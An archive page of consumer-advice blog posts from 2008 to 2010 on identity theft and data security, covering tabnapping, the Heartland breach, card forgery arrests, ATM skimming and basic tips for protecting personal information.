Archive for the ‘Data security’ Category

« Older Entries

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months,  a dangerous new threat has emerged in the world of internet phishing. Many of us have often laughed at the crude and poorly crafted phishing explorations that often invade our in-box.

Lest any of us fall asleep at the wheel thinking we are already hip to the rather primitive  phishing tactics of the past, this one could easily  catch you in it’s insidious hooks if you don’t read on.

Known as “tabnapping”, this ploy is designed to psych you out with a behind-the-back switcheroo that literally kidnaps  open tabs and catches most savvy observers by surprise. Using an almost invisible layer of embedded JavaScript, here’s how it works.

Brian Krebs explains:

” As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javacript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds, a tabbed page silently and almost invisibly changes to a seemingly familiar page (including the cute little “favicon” in the address bar) which requires you to re-enter your log-in credentials. As soon as you enter your private details,  both you and your personal information  have literally been “had”.

The best defense against this tricky new tactic is to take a time-out. What that means is whenever a site you visit “times-out” , you should take some time-out of your browsing frenzy to open a new tab and re-enter the desired URL yourself.

Most browsers including Safari, Chrome,  Firefox and Internet Explorer claim to be on the lookout for you by blocking tabnapping attack code. Researchers and hackers have both been able to sidestep many of the current blocking protections,  leaving most browsers vulnerable.

Safety dictates that you don’t log in on any tab that you  have not opened yourself. Get into the habit of opening fresh tabs whenever you enter a user-name or password.

If you forget to refresh previously opened and familiar log in pages, one day soon you could literally open up a fresh can of worms.

Posted in Data security, Financial Scams, Internet, Phishing | 1 Comment »

ID Theft Is Lurking In Your Computer

Monday, June 7th, 2010

Personal computing guru Steve Bass recently shared some rather eye-opening statistics in his value-packed newsletter,  Techbite.

Security vendor PC Pitstop Research analyzed just over 50, 000 computers for evidence of security threats, vulnerabilities, viruses and protection tools. Immediately, some interesting results emerged.

Can you guess what percentage of computer users have absolutely no security software installed on their machines? The answer is that a shocking 23% of us are flying through cyberspace as naked as  jay birds!

The PC Pitstop  study was looking for evidence of threats which we should all be on the lookout for such as Spyware, Malware / Rogueware and Keyloggers.

For clarity, the article defined its terms,  so there would be  no confusion about the nature or intent of each of these threats.

According to the report:

” We define spyware as the software that is unintentionally installed on the target computer. … A new growing segment of malware is rogue or phony security software.… Keyloggers are a category of software that is intended to monitor the activity of a target computer. This is a rather dangerous category since this form of malware can be used for identity theft, stalking and other ugly criminal activity.”

The good news is that Symantec, Trend Micro, Kaspersky and other leading providers are very effective in their own areas of strength,  at delivering protection from many of the most common  threats:

  • Kaspersky was rated best against rogue software
  • Symantec was best in the fight against spyware
  • Trend Micro was best against keyloggers
  • Kaspersky was best against viruses

One of the takeaways here is that not all threats can be stopped with just one form of security. Redundancy in various computer security software programs is the best way to keep the multiplying strains of threats at bay.

The underlying theme from this study is that ” no one security provider is good at protecting against all aspects of security. As the analysis suggests, each vendor has some strengths and weaknesses.”

The reality that a given threat could progress  from mischievous to menacing to malicious, is a real possibility in our data-rich daily lives.

Protect your data and assets accordingly.

Posted in Anti-virus software, Computer safety, Data security, Personal privacy | No Comments »

Cyber Battlefield In Our Own Backyard

Thursday, May 6th, 2010

With the war in Iraq winding down and the war in Afghanistan heating up, many of us are unaware of the cyber-war raging on our own home turf.  If this is old news to you, stay with me.

According to a Congressional committee, attacks on the Department of Defense computer systems jumped 60 percent in 2009.

Russia, China and North Korea have all launched sustained attacks on U.S. government agencies including the Federal Trade Commission and the Department of the Treasury.

Analysts believe that security standards like the ones created by the National Institute of Standards and Technology (NIST), should be implemented immediately. According to the experts, NIST could get us 90 percent closer to where we need to be.

In Congressional testimony earlier this year, former National Intelligence Director Mike McConnell said that we could be on the brink of an all-out cyberwar. McConnell’s view has been repudiated by the current Secretary of Defense Robert Gates.

If  Moore’s law is true,  (every 24 months a dollar buys twice the amount of computing power that it did before) our enemies may be able to buy, beg, borrow or hack twice as much of our data as  they can today for the same effort.

Computer scientist Daniel Geer Jr. aptly reveals what is at stake:

” We have spent centuries learning about securing the physical world, plus a few years learning about securing the digital world. What we know to be common to both is this: That which cannot be tolerated must be prevented.”

America’s most valued, electronically stored data is being targeted. Government agencies, private think tanks and university data warehouses are all vulnerable. The enemy operates from a distance with virtually no risk of personal danger.

What defense mechanisms can we construct to prevent our data from being stolen at the speed of light?

Tags: ,
Posted in Cyberwar, Data security | No Comments »

Top U.S. Banker Newest ID Theft Poster Child

Saturday, September 5th, 2009

On August 25th, President Barack Obama nominated Ben Bernanke to another term as chairman of the Federal Reserve.

In a story reported this week by The Economist:

“The decision was widely hailed on Wall Street and in Washington, DC. With few exceptions, politicians and economists lined up to praise Mr. Bernanke and to laud Mr. Obama for keeping him.”

Coincidentally, also on August 25th, Newsweek Magazine reported:

“Last summer, just as he was dealing with the first rumblings of the financial crisis on Wall Street, Bernanke learned that a thief had swiped his wife’s purse-including the couple’s joint check book. Later, someone started cashing checks on the Bernanke family account…”

“The theft of the Bernanke check book-never publicly revealed until now-soon became part of a wide-ranging (and previously underway) identity-theft investigation by the Secret Service and the U.S. Postal Inspection Service.”

The shocking news is that the “previously underway” investigation exposed what the Justice Department calls “the largest alleged credit and debit card data breach ever charged in the United States.”

Many of the highest profile breaches in U.S. history are allegedly the result of this one mastermind’s activity. Thankfully, the ringleader and two of his co-conspirators are behind bars now.

Victims of the crime-spree reportedly include:

  • Heartland Payment Systems
  • Supermarket chain Hannaford Brothers
  • 7-Eleven stores
  • DSW shoe stores
  • TJ Maxx stores

This is a wake up call for America. If brazen purse snatchers can swipe cash from our top banker’s checking account and hackers can swipe “protected” corporate data with impunity, then the average American continues to remain vulnerable beyond belief.

Protecting your mail, private pins , personal data, passwords, payment instruments (credit/debit cards, checks) and computer data is YOUR responsibility. Despite our best efforts, the portability of data outside of our control, leaves us all exposed in this digital world.

This truth-is-stranger-than-fiction story illustrates another truth. Without the dedicated and ongoing effort of law enforcement, your personal, medical or bank records are just as vulnerable as an attractive unattended purse, slung over the back of a chair at the local Starbucks.

Posted in Check scams, Data Breaches, Data security, Federal Government, Police agencies | No Comments »

Financial fear grips vast majority of Americans

Friday, April 10th, 2009

A new study conducted and released by Unisys Corporation reveals what most observers and pundits have been saying about our collective jittery nerves lately. With this new level of fear come concerns about fraud and ID theft reaching new heights  and threatening Americans more than ever.

According to the story published on Webwire: “The research, conducted with the latest Unisys Security Index, also confirms that most people are much more worried about their financial security, which saw a 12 percent spike when compared to results polled in September 2008. 

This concern now ranks as Americans’ number one security fear for the first time since Unisys began the global study in 2007. Conversely, the current data also shows the lowest level of concern about national security issues among U.S. consumers.”

The Webwire story goes on to report that more than two thirds of Americans are extremely worried or very concerned about other people obtaining and using their credit or debit card details, with 90 percent at least somewhat concerned.

The better news is that most of the identity theft strategies I’ve written about for some time now, can still protect consumers even in an age of unparalleled financial uncertainty.

By protecting your personal, private and proprietary information, you can still mitigate the effects of our current financial crimes tsunami. By guarding your credit and debit card numbers, bank account numbers, social security numbers, checking account numbers, pin numbers, passwords and computer files……you take away the match sticks that could ignite into to a personal financial firestorm.

None of these methods (including credit monitoring services) are guaranteed to prevent your information from falling into the wrong hands. Careful monitoring of billing and banking statements, credit reports and other financial and medical records will keep you positioned to spot a potential problem.The businesses we frequent also have a responsibility to protect our data and our dollars.

The Unisys study goes on to report: “Banks and businesses need to understand that customers are more wary than ever about using services that may compromise their personal data. If economic concerns increase these fears, companies need new strategies to strengthen customer confidence through accountability and transparency, which also plays to part of the Obama administration’s call to action for government and business.”

The fear gripping our economy is understandable, but we can take proactive steps to minimize our exposure. As a last resort, we can all just repeat this prayer:

“Lord, defend me from my friends; I can account for my enemies.” — Charles DHericault

Posted in Data security, Federal Government, Financial Security | No Comments »

A Spyware Case Where Bigger Is Not Better

Sunday, February 1st, 2009

The Heartland Payment Systems security breach is now considered to possibly be the biggest in history.

The massive theft which is thought to have occurred sometime in 2008, may have allowed the hackers to swipe credit card data from more than 100 million accounts. Apparently, it was spy-ware installed on the company’s internal network that grabbed the data.

PCWorld Magazine reported:

“Heartland says it didn’t discover the breach until Visa and MasterCard came knocking about suspicious activity involving card numbers processed by Heartland……

It’s all the more sad that we as consumers really can’t do a darn thing to protect ourselves against this kind of theft. We can be incredibly careful with our own PC and data, but we have no control over how it’s handled by the plethora of companies that store and process our information.”

According to the Washington Post, Heartland President and CFO Robert Baldwin contacted the U.S. Secret Service as well as two breach forensics teams to investigate.

In terms of sheer volume, Baldwin said:

“The transactional data crossing our platform, in terms of magnitude… is about 1oo million transactions per month.”

This type of breach leaves you and I powerless to prevent it and vulnerable as a result. The stolen Heartland data is precisely what crooks need to create counterfeit credit cards.

That is why the following basics of Identity Theft Protection should be a part of YOUR financial planning.

  1. Carefully watch all your credit card statements for irregularities
  2. Be on the look out for small charges from unknown creditors and report them
  3. Consider freezing your credit files if you don’t plan to apply for new credit soon
  4. The use of a credit card leaves you LESS vulnerable than using a debit card card
  5. Grab a free credit report at least 3 times a year for FREE

CEO Baldwin was quoted as saying simply:

“….we recognize and feel badly about the inconvenience this is going to cause consumers.”

The giant credit card processor feels badly. I’ll sleep better now.

Posted in Credit card fraud, Credit industry, Data Breaches, Data security, Personal privacy | No Comments »

ID Theft Scam Makes Front Page Headlines in L.A.

Saturday, December 6th, 2008

The Los Angeles Daily News ran a front page headline yesterday that was right up my alley! The L.A.P.D . in this case, got their man and the bust was one of the most significant fraud arrests in recent Southern California memory.

Not only was the culprit apprehended after a lengthy investigation, but the tools of his trade were confiscated, making this arrest one of the more successful in terms of peeking into the secret world of a full time identity thief.

Like the illusionists in Las Vegas, these trade secrets are highly guarded from the public unless someone gets the chance to pull the curtain back to reveal the inner-workings of these clever con-men.

As reported in the Daily News yesterday:

“….underneath his cool and collected exterior, the 44-year old man was found to possess more than 1000 forged credit cards he used to scam San Fernando Valley residents and businesses in an operation estimated to have netted millions of dollars, police said. His bail was set at $2 million and we’re investigating mail fraud, grand theft and additional charges…”

Investigators discovered state-of-the-art tools and equipment that enabled the suspect to create magnetic strips for the back of the fake credit cards. Stores like Costco, Wal-mart and Sam’s Club were perfect locations for the suspect to go on shopping sprees with the fake credit cards.

Fortunately, an alert internal investigations team at Costco noticed the suspect’s unusual purchasing patterns in one of their stores and the investigation was finally brought to a conclusion several months later.

Thanks in part to Hollywood, the theft or misappropriation of an identity for the purpose of financial gain is all to common in television and movies, which desensitizes us to the devastating financial impact of this no-so-victimless crime in the “real world”.

Anyone who rents property should note that this particular case includes private financial information which was included on confiscated rental applications. Costco has partnered with Identity Guard to offer credit monitoring services to their members for a nominal monthly fee.

A few reminders are in order:

  • Don’t lend your credit cards to anyone (seems obvious I know)
  • Monitor your statements to detect unauthorized activity on your account
  • Report suspicious activity in writing to the card issuer
  • Make sure your mailbox is locked to protect statements or new cards that arrive
  • Minimize the number of credit cards that you carry
  • College dorms and apartments are rich targets for prying eyes and sticky fingers
  • Use online sites that start with https:// which tend to indicate they are “secure”

This case underscores the reality and vitality of professional identity theft gangs. Although credit isn’t as easy to obtain during this holiday season as it has been in the past, your chances of being victimized are better than ever.

Desperate times call for deliberate counter-measures!

Posted in Credit card fraud, Data security | No Comments »

If Obama and Palin Can Be Hacked, So Can You!

Monday, December 1st, 2008

With the holiday season upon us and the election season behind us, the average consumer may have their attention diverted away from personal privacy issues.

President-elect Barack Obama and Alaska Gov. Sarah Palin were concentrating on the election, while high tech thieves smelled an opportunity to violate the candidates’ privacy with reckless abandon. These fraudsters were phone company insiders and random email hackers, not mobsters from an Eastern European crime family.

Here is an excerpt from a story posted on fiercewireless.com:

“Verizon Wireless has fired the employees who accessed President-elect Barack Obama’s personal cell phone account without authorization.

A report on CNN.com quoted an unnamed Verizon source, who would not disclose how many people were fired but said, “we now consider this matter closed.” Apparently the employees were involved in customer service and were not authorized to look at an account unless a customer requested it.

The source also said that records of no other well-known customers had been breached. The phone that was accessed was a flip phone that had been inactive for months, and was not a Blackberry or other smartphone from which email could have been sent or data services could have been accessed.”

In Palin’s case, a 20-year-old student at the University of Tennessee has been indicted for breaking into one of Palin’s accounts and posting the information on a public website.

Here’s the point. We are all vulnerable to attack even if we are careful to do everything right in the privacy arena. Recovering from the emotional roller-coaster and sense of violation after being victimized can be both traumatic and lengthy. In extreme cases, you could even be facing a run-in with the law.

Prepare to remain steadfast this holiday season. If you are a member of AAA, you can unwrap an early Christmas present from them just by visiting their website and reading about their “free”, yes FREE credit monitoring and alerts for members only.

Posted in Data security, Federal Government, Personal privacy | No Comments »

How A Financial Crisis Leaves Our Data Vulnerable

Wednesday, October 15th, 2008

As major banks, insurance companies and investment firms fall victim to the current tsunami of financial storms, your privacy may suffer. When firms change hands, downsize their payrolls and transfer massive amounts of data, proprietary information is left exposed and privacy erodes.

At the end of September, the Dow Jones Industrial Average took the single biggest dive in history, dipping 777 points. In the wake of the impending reorganization of American business, your credit card balances, your mortgage, your savings accounts and your credit history will probably be reshuffled and reinserted into the database of the account’s new overseer.

After days of marathon negotiations, the bailout measure initially went down to defeat in the Congress by a vote of 228 to 205. After the Senate and the House gave final approval for a modified version of the $700 billion rescue plan, President Bush signed it into law on October 3rd, 2008.

Although the free markets globally are facing their toughest challenge ever, those markets do work. The problem is that they are controlled by human beings who are subject to behavior that is sometimes irrational, emotional and irresponsible.

Because of the irresponsible and sometimes deliberate misdeeds of the guardians of the financial gate, it is still your responsibility to to guard your personal information the best way you know how.

If you do not have a personal identity theft risk prevention, detection and mitigation plan in place, what are you waiting for? Visit the Privacy Rights Clearinghouse for great tips on how to protect yourself.

Posted in Data security, Federal Government, Personal privacy | No Comments »

Identity Appreciation Month

Monday, September 1st, 2008

I appreciate the value of my intact identity profile…don’t you?

It has been too long since my last post. The past month has been a whirlwind for me as a result of my vacation to China.

As anyone who travels regularly will tell you, keeping tabs on your identity is a both a necessary evil and a blessing beyond belief when traveling abroad. Venturing off to China during the Olympics is certainly a test of all the safeguards that are supposed to be in place to make sure that you are really the real you when you travel.

Passing through customs, immigration and the tightest security I have ever witnessed gave me both a sense of awe and gratitude. Chinese security officials had their hands full and the world witnessed one of the most spectacular displays of pomp, ceremony and athletic achievement ever organized.

At the same time, security was at an all time high for good reason. The eyes of the world were fixed on Beijing and our hosts wanted the occasion to shine. I think we all agree …..it did.

The 12 hour flight from the West Coast gave me a chance to catch up on some of the latest and greatest scams we are facing here at home. One that caught my eye in particular was the number of credit card skimming cases which the Secret Service is investigating around the country.

In my seminars, I magically produce and vanish a card “reader” which could be called a “skimming device” if it fell into the wrong hands. The problem is that we are so used to seeing them, that we don’t even think about sliding our credit and debit cards into a device at an ATM, bank or retail location.

The challenge is that these high tech and deceptive skimmers don’t prevent the machine we are accessing from working and can be painted to match the color of any legitimate machine. According to USA Today, there are major investigations going on right now in California, Delaware, Nevada, Pennsylvania and Washington.

In Washington state alone, the number of recent victims could total as high as 250 people with losses totaling $500,000. The combined total of the cases totals between $1 million to $3.5 million stolen from victims.

The obvious first step for self protection is awareness and a keen eye for anything that may look suspicious. Thieves quite often place a small camera on or near the pump or ATM which records pin numbers as you key them in.

Diligent, constant awareness of irregularities and unauthorized activity on your accounts is your personal responsibility. The good news for American consumers is that reporting fraudulent or suspicious activity generally stops or reverses damage done with credit cards and most debit cards bearing the Mastercard or Visa logos. Irregularities must be reported in a “timely fashion” which generally means 60 days or less from discovery of the event.

Yes, old fashioned skimming is alive and well and being dispensed at an ATM or gas pump near you.

Posted in Credit card fraud, Data security, Personal privacy, Uncategorized | No Comments »

« Older Entries